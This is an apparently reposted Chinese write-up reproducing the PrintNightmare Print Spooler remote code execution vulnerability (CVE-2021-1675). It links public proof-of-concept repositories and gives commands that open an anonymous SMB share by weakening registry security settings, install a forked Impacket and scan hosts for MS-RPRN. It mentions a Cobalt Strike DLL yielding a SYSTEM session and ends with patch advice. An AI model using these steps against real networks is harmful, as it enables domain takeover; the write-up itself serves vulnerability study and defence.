1、漏洞描述
Windows Print Spooler是Windows的打印机后台处理程序,广泛的应用于各种内网中。近期安全研究人员在Github公布了Windows PrintSpooler远程代码执行漏洞POC。攻击者可以通过该漏洞绕过PfcAddPrinterDriver的安全验证,并在打印服务器中安装恶意的驱动程序,若攻击者所控制的用户在域中,则攻击者可以连接到DC中的Spooler服务,并利用该漏洞在DC中安装恶意的驱动程序,完整的控制整个域环境。
Github公布的地址:https://github.com/afwu/PrintNightmare
2、漏洞准备
这里我们使用python版本的poc
地址:https://github.com/cube0x0/CVE-2021-1675
环境:win2016
首先创建一个可以允许匿名访问的smb
创建时使用powershell
mkdirC:share
icaclsC:share /T /grant Anonymous` logon:r
icaclsC:share /T /grant Everyone:r
New-SmbShare-Path C:share -Name share -ReadAccess 'ANONYMOUS LOGON','Everyone'
REG ADD"HKLMSystemCurrentControlSetServicesLanManServerParameters" /vNullSessionPipes /t REG_MULTI_SZ /d srvsvc /f #This will overwrite existingNullSessionPipes
REG ADD"HKLMSystemCurrentControlSetServicesLanManServerParameters" /vNullSessionShares /t REG_MULTI_SZ /d share /f
REG ADD"HKLMSystemCurrentControlSetControlLsa" /v EveryoneIncludesAnonymous/t REG_DWORD /d 1 /f
REG ADD"HKLMSystemCurrentControlSetControlLsa" /v RestrictAnonymous /tREG_DWORD /d 0 /f
# Reboot
3、漏洞利用
在运行漏洞利用之前,您需要安装Impacket 版本
pip3 uninstall impacket
git clone https://github.com/cube0x0/impacket
cd impacket
python3 ./setup.py install
可以使用rpcdump.py
来扫描潜在的易受攻击的主机,如果它返回一个值,它可能是易受攻击的
rpcdump.py @192.168.1.10 | grep MS-RPRN
协议:[MS-RPRN]:打印系统远程协议
然后进行利用,这里使用dll是cs生成的dll
返回了system的会话
4、修复建议
安装微软 CVE-2021-1675 漏洞补丁
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1675
关闭打印机服务
本文始发于微信公众号(Khan安全攻防实验室):Windows Print Spooler CVE-2021-1675 漏洞复现
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论